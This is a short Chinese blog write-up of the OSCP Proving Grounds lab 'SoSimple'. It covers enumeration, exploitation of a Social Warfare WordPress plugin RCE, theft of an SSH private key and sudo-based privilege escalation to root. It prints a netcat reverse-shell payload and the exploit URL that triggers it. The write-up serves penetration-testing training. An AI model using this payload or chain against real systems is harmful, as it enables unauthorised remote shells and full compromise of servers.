OSCP-PG-SoSimple

Mkd1R 2022-5-21 78 5/21

我首先使用了nmap IP -vvv扫描了主机存在的端口

随后我又使用-p与-A参数对主机进行了全面扫描,得到了服务于主机的详细版本

使用了searchsploit并没有找到有相关的缺陷,只能从80端口出发

源码中提示我们需要进一步查看,随后我使用了gobuster进行目录扫描,没过多久就扫出了一个wordpress目录

尝试了几个弱口令但并没有常规,随后我使用了wpscan对wordpress进行了扫描,得到了插件的具体版本

随后我使用百度查找了相关内容,并发现Social Warfare v3.5.0存在RCE漏洞,并成功进行了利用
我写了一个rce.txt内容如下

<pre>
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.197 2222 >/tmp/f');
</pre>

并在本地使用python -m SimpleHTTPServer开启了简易的http提供服务,从主机的80端口进行远程访问
http://192.168.187.78/wordpress/wp-admin/index.php?swp_debug=load_options&swp_url=http://192.168.49.187:8000/rce.txt
本地在监听的2222端口成功收到了shell

我在home目录的max家目录中成功找了一个低权限标识,以及一个id_rsa

我将id_rsa保存到了本地并将权限修改为了600,成功的使用ssh连接了进去

当我使用sudo -l查看max用户拥有哪些权限的时候发现,可以NOPASSWD使用steven的service目录,这可以使我们移动到steven

令我意外的是当我再次使用sudo -l查看steven用户的权限时,发现可以NOPASSWD执行一个sh脚本,再次之前我需要自己创建tools目录以及server-health.sh文件,并赋予了server-health.sh可执行的权限,随后当我执行sudo -u root ./server-health.sh命令时,我本地监听的2223端口收到了root权限的shell

 

- THE END -

Mkd1R

7月02日21:55

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。